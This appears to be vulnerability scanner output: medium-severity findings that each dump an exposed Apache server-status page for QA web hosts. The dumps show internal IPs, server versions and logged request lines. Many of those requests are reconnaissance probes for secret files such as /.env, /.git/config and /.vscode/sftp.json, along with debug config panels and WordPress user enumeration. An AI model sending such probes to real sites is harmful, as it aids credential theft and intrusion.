HTTP/1.1 16-0101570/7/178R 0.015341497170.00.0614.27 10.253.106.215http/1.1 17-0139603/6/123K 0.003785163.10.011.47 10.253.106.141http/1.1qa1-chemicals.thermofisher.co.kGET /.env HTTP/1.1 18-0130800/1/171R 0.00257124155790.00.022.37 10.253.106.141http/1.1 19-0120780/5/155R 0.015143120930.00.832.81 10.253.106.141http/1.1 20-098243/15/103K 0.013048203.40.061.78 10.253.106.141http/1.1qa1-chemicals.thermofisher.co.kGET / HTTP/1.1 21-0130811/3/134K 0.0043831420.70.011.40 10.253.106.215http/1.1qa1.unitylabservices.com:80GET /.vscode/sftp.json HTTP/1.1 22-0116976/10/115K 0.020272398.90.060.67 10.253.106.215http/1.1qa1-chemicals.thermofisher.co.kGET /server-status HTTP/1.1 23-0140240/0/122R 0.007980102190.00.001.48 10.253.106.141http/1.1 24-0139610/0/146R 0.00498051050.00.005.36 10.253.106.141http/1.1 25-0136380/0/105R 0.00835050960.00.002.54 10.253.106.215http/1.1 26-0145416/6/83K 0.000148937.30.010.40 10.253.106.215http/1.1qa1-chemicals.thermofisher.co.kGET /config.json HTTP/1.1 27-0145426/6/185K 0.00012183496.00.012.62 10.253.106.215http/1.1qa1-chemicals.thermofisher.co.kGET /api/search?folderIds=0 HTTP/1.1 28-0139631/2/153K 0.00440183500.80.003.22 10.253.106.215http/1.1qa1.unitylabservices.com:80GET /telescope/requests HTTP/1.1 29-0145431/1/161K 0.0047137180.70.00203.31 10.253.106.215http/1.1qa1-corporate.thermofisher.com:GET /.env HTTP/1.1 30-01308516/17/102K 0.02438322059.20.061.15 10.253.106.215http/1.1qa1.unitylabservices.com:80GET /.env HTTP/1.1 31-0145440/0/114R 0.007017200.00.001.02 10.253.106.215http/1.1 32-0145456/7/159K 0.0035168684.60.011.80 10.253.106.141http/1.1qa1-chemicals.thermofisher.co.kGET /.vscode/sftp.json HTTP/1.1 33-090633/36/150K 0.0343861272.30.200.98 10.253.106.215http/1.1qa1.unitylabservices.com:80GET /.DS_Store HTTP/1.1 34-0130870/0/117R 0.008390138960.00.001.46 10.253.106.141http/1.1 35-0140250/0/190R 0.007980147040.00.004.24 10.253.106.215http/1.1 36-0140260/0/121R 0.00781029700.00.0020.89 10.253.106.215http/1.1 37-0139641/10/105K 0.014094571.00.03194.55 10.253.106.215http/1.1qa1.onelambda.com:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 38-0132801/3/106K 0.0043824060.70.001.22 10.253.106.215http/1.1qa1.onelambda.com:80GET /.env HTTP/1.1 39-0140270/0/115R 0.00781031160.00.001.38 10.253.106.215http/1.1 40-0139656/7/242K 0.2144094128.90.401.70 10.253.106.215http/1.1qa1.unitylabservices.com:80GET /debug/default/view?panel=config HTTP/1.1 41-0132824/11/146K 0.013360837.70.012.13 10.253.106.141http/1.1qa1-chemicals.thermofisher.co.kGET /server-status HTTP/1.1 42-0139660/11/143_ 0.0001253750.00.011.59 10.253.106.215http/1.1qa1-chemicals.thermofisher.co.kGET /.git/config HTTP/1.1 43-0132836/9/211K 0.0101471097.10.055.09 10.253.106.215http/1.1qa1-chemicals.thermofisher.co.kGET /s/3333e2738313e26313e223/_/;/META-INF/maven/com.atlassian. 44-0145465/10/170K 0.013665278.60.029.77 10.253.106.141http/1.1qa1-chemicals.thermofisher.co.kGET /login.action HTTP/1.1 45-0139681/1/141K 0.00412187361.30.001.83 10.253.106.215http/1.1qa1-corporate.thermofisher.com:GET /debug/default/view?panel=config HTTP/1.1 46-0145476/6/170K 0.0001141737.40.012.21 10.253.106.215http/1.1qa1-chemicals.thermofisher.co.kGET /about HTTP/1.1 47-0145483/3/110K 0.0001029093.90.000.72 10.253.106.215http/1.1qa1-chemicals.thermofisher.co.kGET /info.php HTTP/1.1 48-0118877/39/134K 0.22402280510.50.841.08 10.253.106.215http/1.1qa1-corporate.thermofisher.com:GET /?rest_route=/wp/v2/users/ HTTP/1.1 49-0139691/1/89K 0.004056491.10.000.77 10.253.106.215http/1.1qa1-corporate.thermofisher.com:GET / HTTP/1.1 50-0139700/6/104_ 0.000934360.00.010.24 10.253.106.141http/1.1qa1.unitylabservices.com:80GET /.git/config HTTP/1.1 51-0139710/0/87R 0.00982055920.00.00
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31fed0127cfed0127ccfbda782
Apache Status Apache Server Status for qa1.unitylabservices.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Friday, 14-Apr-2023 16:46:44 EDT Restart Time: Thursday, 13-Apr-2023 11:25:25 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 1 day 5 hours 21 minutes 18 seconds Server load: 0.07 0.02 0.00 Total accesses: 31431 - Total Traffic: 623.2 MB - Total Duration: 570266 CPU Usage: u7.13 s13.11 cu34.85 cs7.75 - .0595% CPU load .297 requests/sec - 6.0 kB/second - 20.3 kB/request - 18.1434 ms/request 40 requests currently being processed, 25 idle workers _KKRRR_RRR_RRRW_R_RRR_KRRR__R_K__WRRR__RKKK_____W__RR__R_R_RR_.. ..RRR........................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0103080/32/164_ 0.05126037180.00.200.87 10.253.106.215http/1.1 1-0383810568/10568/10568K 4.9850496815966.415.5915.59 10.253.106.141http/1.1qa1-chemicals.thermofisher.co.kGET /server-status?auto HTTP/1.1 2-0383910568/10568/10568K 6.1950611015966.315.5915.59 10.253.106.215http/1.1qa1-chemicals.thermofisher.co.kGET /server-status?auto HTTP/1.1 3-0134500/0/196R 0.00530082210.00.002.48 10.253.106.141http/1.1 4-0136360/1/169R 0.00835057860.00.001.95 10.253.106.215http/1.1 5-0134510/10/325R 0.002530111870.00.430.92 10.253.106.141http/1.1 6-0130770/13/139_ 0.011261324680.00.052.13 10.253.106.215http/1.1 7-0128580/6/134R 0.00571023960.00.011.33 10.253.106.215http/1.1 8-0140220/0/129R 0.00815041440.00.002.57 10.253.106.215http/1.1 9-0132680/1/199R 0.00253141124480.00.013.42 10.253.106.141http/1.1 10-0145380/0/144_ 0.004049420.00.001.15 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 11-0134520/6/129R 0.00510040440.01.292.74 10.253.106.141http/1.1 12-0140230/0/120R 0.00794033270.00.001.09 10.253.106.141http/1.1 13-0135070/0/149R 0.00571085980.00.001.24 10.253.106.141http/1.1 14-0136377/7/156W 0.0100310946.00.041.08 10.253.106.141http/1.1qa1.onelambda.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 15-0145400/0/145_ 0.003055200.00.004.17 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 16-0101570/7/178R 0.015301497170.00.0614.27 10.253.106.215http/1.1 17-0139600/0/117_ 0.00253083870.00.001.46 10.253.106.141http/1.1 18-0130800/1/171R 0.00253124155790.00.022.37 10.253.106.141http/1.1 19-0120780/5/155R 0.015103120930.00.832.81 10.253.106.141http/1.1 20-098240/11/99R 0.012664147990.00.061.77 10.253.106.215http/1.1 21-0130810/2/133_ 0.00247030660.00.011.40 10.253.106.141http/1.1 22-0116971/5/110K 0.014071231.00.050.66 10.253.106.215http/1.1qa1.onelambda.com:80GET /en/home.html HTTP/1.1 23-0140240/0/122R 0.007940102190.00.001.48 10.253.106.141http/1.1 24-0139610/0/146R 0.00494051050.00.005.36 10.253.106.141http/1.1 25-0136380/0/105R 0.00831050960.00.002.54 10.253.106.215http/1.1 26-0145410/0/77_ 0.00307710.00.000.39 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 27-0145420/0/179_ 0.0020181790.00.002.61 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 28-0139630/1/152R 0.004880182700.00.003.22 10.253.106.215http/1.1 29-0145430/0/160_ 0.0020137030.00.00203.31 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 30-01308515/16/101K 0.0200314458.60.061.15 10.253.106.215http/1.1qa1-corporate.thermofisher.com:GET / HTTP/1.1 31-0145440/0/114_ 0.002017200.00.001.02 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 32-0145450/0/152_ 0.0020167330.00.001.79 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 33-090631/34/148W 0.020059720.90.200.98 10.253.106.215http/1.1qa1.onelambda.com:80GET /.vscode/sftp.json HTTP/1.1 34-0130870/0/117R 0.008350138960.00.001.46 10.253.106.141http/1.1 35-0140250/0/190R 0.007940147040.00.004.24 10.253.106.215http/1.1 36-0140260/0/121R 0.00777029700.00.0020.89 10.253.106.215http/1.1 37-0139640/9/104_ 0.01126094560.00.03194.54 10.253.106.215http/1.1 38-0132800/2/105_ 0.002534123290.00.001.22 10.253.106.141http/1.1qa1.onelambda.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 39-0140270/0/115R 0.00777031160.00.001.38 10.253.106.215http/1.1 40-0139652/3/238K 0.210291965.70.391.70 10.253.106.215http/1.1qa1.onelambda.com:80GET /server-status HTTP/1.1 41-0132821/1/136K 0.000058950.90.002.12 10.253.106.141http/1.1qa1-chemicals.thermofisher.co.kGET / HTTP/1.1 42-0139661/2/134K 0.000050360.90.001.58 10.253.106.215http/1.1qa1.unitylabservices.com:80GET / HTTP/1.1 43-0132830/3/205_ 0.01247068630.00.045.08 10.253.106.141http/1.1qa1.onelambda.com:80GET /en/home.html HTTP/1.1 44-0145460/0/160_ 0.001063650.00.009.75 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 45-0139680/0/140_ 0.001260187110.00.001.83 10.253.106.215http/1.1 46-0145470/0/164_ 0.001040000.00.002.20 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 47-0145480/0/107_ 0.001028370.00.000.72 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 48-0118872/34/129W 0.2200226382.50.841.08 10.253.106.215http/1.1qa1.unitylabservices.com:80GET /server-status HTTP/1.1 49-0139690/0/88_ 0.00123056490.00.000.76 10.253.106.215http/1.1 50-0139700/0/98_ 0.00123031740.00.000.24 10.253.106.215http/1.1 51-0139710/0/87R 0.00978055920.00.005.78 10.253.106.141http/1.1 52-0139720/0/140R 0.00978017750.00.001.03 10.253.106.141http/1.1 53-0145490/0/149_ 0.001075920.00.006.93 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 54-0145500/0/156_ 0.001095190.00.003.50 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 55-013973
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31fed0127cfed0127c10607c47
Apache Status Apache Server Status for qa1.unitylabservices.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Thursday, 16-Mar-2023 07:20:17 EDT Restart Time: Wednesday, 15-Mar-2023 17:19:06 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 14 hours 1 minute 10 seconds Server load: 0.00 0.00 0.00 Total accesses: 14036 - Total Traffic: 115.1 MB - Total Duration: 286431 CPU Usage: u3.7 s6.68 cu20.89 cs2.54 - .067% CPU load .278 requests/sec - 2391 B/second - 8.4 kB/request - 20.4069 ms/request 48 requests currently being processed, 28 idle workers .R..KRRK.KRRR.WWR_RKWRKRRRR_RK_KKRRR__.___RRK_R__R_R__R_R___R___ __RRRK_KRRK_RR__W_.............................................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0-0/0/91. 0.0058068020.00.002.12 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 1-099570/20/66R 0.04603082490.00.150.93 10.253.106.224http/1.1 2-0-0/0/77. 0.0028092420.00.001.34 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 3-0-0/0/78. 0.0029037680.00.002.72 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 4-016225047/5047/5047K 2.859029307617.87.447.44 10.253.106.249http/1.1qa1-corporate.thermofisher.com:GET /server-status?auto HTTP/1.1 5-0150910/23/52R 0.0597016712020.00.260.36 10.253.106.249http/1.1 6-0205910/0/74R 0.0089014960.00.000.91 10.253.106.249http/1.1 7-016255047/5047/5047K 2.882029567618.77.447.44 10.253.106.224http/1.1qa1-corporate.thermofisher.com:GET /server-status?auto HTTP/1.1 8-0-0/0/56. 0.005908020.00.000.18 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 9-0180404/20/56K 0.0692020624.10.821.40 10.253.106.249http/1.1qa1.unitylabservices.com:80GET / HTTP/1.1 10-0166760/12/54R 0.20908022020.00.771.95 10.253.106.249http/1.1 11-0180410/1/47R 0.00666837500.00.001.49 10.253.106.224http/1.1 12-0180420/0/121R 0.006660486950.00.004.30 10.253.106.224http/1.1 13-0-0/0/66. 0.0060016430.00.001.19 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 14-0205922/2/37W 0.000013471.50.000.56 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /.vscode/sftp.json HTTP/1.1 15-0205932/2/68W 0.000011671.50.000.92 10.253.106.249http/1.1qa1.onelambda.com:80GET /.env HTTP/1.1 16-0205940/0/78R 0.0089057090.00.000.87 10.253.106.249http/1.1 17-0206420/2/47_ 0.0004330510.00.002.41 10.253.106.249http/1.1qa1-corporate.thermofisher.com:GET /.git/config HTTP/1.1 18-0167250/2/56R 0.00666018600.00.011.42 10.253.106.224http/1.1 19-0136623/6/47K 0.0066206158355.50.060.93 10.253.106.224http/1.1www-qa.patheon.com:80GET /us/en/home2.html?at_preview_token=YB7l-F-q8CWNxAl21L6Zog&a 20-0206431/1/33W 0.000047420.80.000.25 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /server-status HTTP/1.1 21-0206440/0/49R 0.0066019390.00.001.84 10.253.106.249http/1.1 22-0183301/1/60K 0.00678150119.20.020.54 10.253.106.224http/1.1www-qa.patheon.com:80GET /etc.clientlibs/multisitecommons/clientlibs/clientlib-base/ 23-0206460/0/42R 0.0065020960.00.000.40 10.253.106.249http/1.1 24-0206470/0/64R 0.0065013940.00.000.92 10.253.106.249http/1.1 25-0206480/0/54R 0.0065056810.00.000.50 10.253.106.249http/1.1 26-0206490/0/64R 0.0065028480.00.001.16 10.253.106.249http/1.1 27-0206500/0/52_ 0.0064089370.00.001.44 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 28-0116190/3/34R 0.0097004160.00.000.09 10.253.106.249http/1.1 29-01931260/61/110K 0.06028989137.50.131.17 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /server-status HTTP/1.1 30-0167320/12/81_ 0.010035020.00.091.30 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /.git/config HTTP/1.1 31-0167337/28/81K 0.1504366446.70.542.24 10.253.106.249http/1.1qa1.onelambda.com:80GET /debug/default/view?panel=config HTTP/1.1 32-0154412/4/36K 0.0067862339.50.040.20 10.253.106.224http/1.1www-qa.patheon.com:80GET /etc.clientlibs/multisitecommons/clientlibs/clientlib-base/ 33-0193130/2/61R 0.18866470480.00.411.07 10.253.106.249http/1.1 34-0193140/2/47R 0.00866348210.00.001.03 10.253.106.249http/1.1 35-0193150/0/67R 0.00866014000.00.000.64 10.253.106.249http/1.1 36-0206510/0/55_ 0.0064095090.00.000.69 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 37-0206520/0/82_ 0.0064042870.00.001.73 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 38-0-0/0/76. 0.0061033450.00.002.21 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 39-0206530/0/30_ 0.006402930.00.000.12 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 40-0206540/0/38_ 0.0064012690.00.000.53 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 41-0206550/0/76_ 0.0064048140.00.002.75 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 42-0193160/0/34R 0.00866010200.00.000.97 10.253.106.249http/1.1 43-0193170/4/50R 0.00861321020.00.010.72 10.253.106.249http/1.1 44-0193181/1/50K 0.00671711221390.60.091.19 10.253.106.224http/1.1www-qa.patheon.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 45-0116280/23/48_ 0.023008950.00.100.45 10.253.106.249http/1.1 46-0193190/0/15R 0.0086603870.00.000.03 10.253.106.249http/1.1 47-0206560/0/74_ 0.0064053790.00.001.41 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 48-0206570/0/25_ 0.006402270.00.000.04 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 49-0193200/0/25R 0.0086601310.00.000.07 10.253.106.249http/1.1 50-0206580/0/47_ 0.0063052170.00.000.82 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 51-0193210/0/34R 0.00861020950.00.000.35 10.253.106.249http/1.1 52-0206590/0/34_ 0.0063017740.00.000.47 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 53-0206600/0/33_ 0.0063010700.00.000.16 127.0.0.1http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31fed0127cfed0127ce8bc27a0
Apache Status Apache Server Status for qa1.unitylabservices.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Thursday, 16-Mar-2023 07:20:16 EDT Restart Time: Wednesday, 15-Mar-2023 17:19:06 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 14 hours 1 minute 10 seconds Server load: 0.00 0.00 0.00 Total accesses: 14018 - Total Traffic: 115.1 MB - Total Duration: 285433 CPU Usage: u3.69 s6.68 cu20.89 cs2.54 - .067% CPU load .278 requests/sec - 2391 B/second - 8.4 kB/request - 20.3619 ms/request 41 requests currently being processed, 35 idle workers .R..KR_K.KRRR.WR__RK__K_____RWRWKRRR__.___RRK_R__R_R__R_R___R___ __RRRK_KRRK_RR__W_.............................................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process <SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0-0/0/91. 0.0058068020.00.002.12 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 1-099570/20/66R 0.04603082490.00.150.93 10.253.106.224http/1.1 2-0-0/0/77. 0.0028092420.00.001.34 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 3-0-0/0/78. 0.0029037680.00.002.72 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 4-016225047/5047/5047K 2.859029307617.87.447.44 10.253.106.249http/1.1qa1-corporate.thermofisher.com:GET /server-status?auto HTTP/1.1 5-0150910/23/52R 0.0597016712020.00.260.36 10.253.106.249http/1.1 6-0205910/0/74_ 0.0089014960.00.000.91 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 7-016255047/5047/5047K 2.881029567618.77.447.44 10.253.106.224http/1.1qa1-corporate.thermofisher.com:GET /server-status?auto HTTP/1.1 8-0-0/0/56. 0.005908020.00.000.18 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 9-0180404/20/56K 0.0691020624.10.821.40 10.253.106.249http/1.1qa1.unitylabservices.com:80GET / HTTP/1.1 10-0166760/12/54R 0.20908022020.00.771.95 10.253.106.249http/1.1 11-0180410/1/47R 0.00666837500.00.001.49 10.253.106.224http/1.1 12-0180420/0/121R 0.006660486950.00.004.30 10.253.106.224http/1.1 13-0-0/0/66. 0.0060016430.00.001.19 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 14-0205920/0/35W 0.000011800.00.000.56 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /.vscode/sftp.json HTTP/1.1 15-0205930/0/66R 0.008909980.00.000.92 10.253.106.249http/1.1 16-0205940/0/78_ 0.0089057090.00.000.87 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 17-0206420/0/45_ 0.0067029640.00.002.40 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 18-0167250/2/56R 0.00666018600.00.011.42 10.253.106.224http/1.1 19-0136623/6/47K 0.0066206158355.50.060.93 10.253.106.224http/1.1www-qa.patheon.com:80GET /us/en/home2.html?at_preview_token=YB7l-F-q8CWNxAl21L6Zog&a 20-0206430/0/32_ 0.0066046570.00.000.25 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 21-0206440/0/49_ 0.0066019390.00.001.84 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 22-0183301/1/60K 0.00668150119.20.020.54 10.253.106.224http/1.1www-qa.patheon.com:80GET /etc.clientlibs/multisitecommons/clientlibs/clientlib-base/ 23-0206460/0/42_ 0.0065020960.00.000.40 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 24-0206470/0/64_ 0.0065013940.00.000.92 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 25-0206480/0/54_ 0.0065056810.00.000.50 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 26-0206490/0/64_ 0.0065028480.00.001.16 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 27-0206500/0/52_ 0.0064089370.00.001.44 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 28-0116190/3/34R 0.0097004160.00.000.09 10.253.106.249http/1.1 29-01931259/60/109W 0.06008985133.30.131.16 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /server-status HTTP/1.1 30-0167320/11/80R 0.0190035020.00.091.30 10.253.106.249http/1.1 31-0167330/21/74W 0.140063050.00.532.23 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /.DS_Store HTTP/1.1 32-0154412/4/36K 0.0066862339.50.040.20 10.253.106.224http/1.1www-qa.patheon.com:80GET /etc.clientlibs/multisitecommons/clientlibs/clientlib-base/ 33-0193130/2/61R 0.18866470480.00.411.07 10.253.106.249http/1.1 34-0193140/2/47R 0.00866348210.00.001.03 10.253.106.249http/1.1 35-0193150/0/67R 0.00866014000.00.000.64 10.253.106.249http/1.1 36-0206510/0/55_ 0.0064095090.00.000.69 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 37-0206520/0/82_ 0.0064042870.00.001.73 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 38-0-0/0/76. 0.0061033450.00.002.21 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 39-0206530/0/30_ 0.006402930.00.000.12 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 40-0206540/0/38_ 0.0064012690.00.000.53 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 41-0206550/0/76_ 0.0064048140.00.002.75 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 42-0193160/0/34R 0.00866010200.00.000.97 10.253.106.249http/1.1 43-0193170/4/50R 0.00861321020.00.010.72 10.253.106.249http/1.1 44-0193181/1/50K 0.00671711221390.60.091.19 10.253.106.224http/1.1www-qa.patheon.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 45-0116280/23/48_ 0.023008950.00.100.45 10.253.106.249http/1.1 46-0193190/0/15R 0.0086603870.00.000.03 10.253.106.249http/1.1 47-0206560/0/74_ 0.0064053790.00.001.41 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 48-0206570/0/25_ 0.006402270.00.000.04 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 49-0193200/0/25R 0.0086601310.00.000.07 10.253.106.249http/1.1 50-0206580/0/47_ 0.0063052170.00.000.82 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 51-0193210/0/34R 0.00861020950.00.000.35 10.253.106.249http/1.1 52-0206590/0/34_ 0.0063017740.00.000.47 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 53-0206600/0/33
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31fed0127cfed0127cc27b5566
Apache Status Apache Server Status for qa1.unitylabservices.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Monday, 06-Mar-2023 03:37:19 EST Restart Time: Friday, 03-Mar-2023 12:12:25 EST Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 2 days 15 hours 24 minutes 53 seconds Server load: 0.05 0.01 0.00 Total accesses: 63897 - Total Traffic: 396.8 MB - Total Duration: 1367534 CPU Usage: u15.46 s27.59 cu62.16 cs11.68 - .0512% CPU load .28 requests/sec - 1822 B/second - 6.4 kB/request - 21.4022 ms/request 56 requests currently being processed, 17 idle workers RKKK_KR__RWRRKRRWRR_RWRRRRRRRR_RRRRRR___R_KRR_RR_RKRR____R_W.KWR KWRRKRW_RR...................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process <SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0185250/0/295R 0.005630159620.00.005.57 10.253.106.224http/1.1 1-0174444/5/314K 0.00040226853.60.005.29 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /info.php HTTP/1.1 2-0233583/3/387K 0.00040185922.30.004.45 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /info.php HTTP/1.1 3-01968222830/22830/22830K 12.93101327534574.933.7633.76 10.253.106.249http/1.1qa1-corporate.thermofisher.com:GET /server-status?auto HTTP/1.1 4-064040/6/261_ 0.0110217070.00.094.86 10.253.106.249http/1.1qa1.onelambda.com:80GET /.git/config HTTP/1.1 5-01968422829/22829/22829K 13.07401344534573.633.7633.76 10.253.106.224http/1.1qa1-corporate.thermofisher.com:GET /server-status?auto HTTP/1.1 6-0233590/0/283R 0.00200173210.00.004.37 10.253.106.249http/1.1 7-0149550/9/328_ 0.001410205400.00.013.71 10.253.106.249http/1.1 8-0159460/12/243_ 0.01149186690.00.275.04 10.253.106.249http/1.1 9-0201220/5/371R 0.002940182220.00.016.00 10.253.106.249http/1.1 10-0103551/13/302W 0.0700193000.70.294.61 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /debug/default/view?panel=config HTTP/1.1 11-0159470/1/273R 0.0056840377150.00.005.90 10.253.106.249http/1.1 12-0233600/0/260R 0.00200157020.00.006.11 10.253.106.249http/1.1 13-0220351/13/250K 0.38200137191.00.955.88 10.253.106.224http/1.1qa1.onelambda.com:80GET /en/home.html HTTP/1.1 14-051340/25/317R 0.0456353179310.00.634.48 10.253.106.249http/1.1 15-0233610/0/304R 0.00190221370.00.002.52 10.253.106.249http/1.1 16-0224942/2/237W 0.0000188831.50.004.37 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /.vscode/sftp.json HTTP/1.1 17-0130130/7/270R 0.0855562181540.00.203.52 10.253.106.224http/1.1 18-0233620/0/366R 0.00190233470.00.007.35 10.253.106.249http/1.1 19-0141580/18/364_ 0.01110767270.00.117.46 10.253.106.249http/1.1qa1-corporate.thermofisher.com:GET /.git/config HTTP/1.1 20-0224950/0/225R 0.002570231340.00.003.38 10.253.106.249http/1.1 21-0201260/9/261W 0.0000169070.00.015.98 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /server-status HTTP/1.1 22-0201270/1/326R 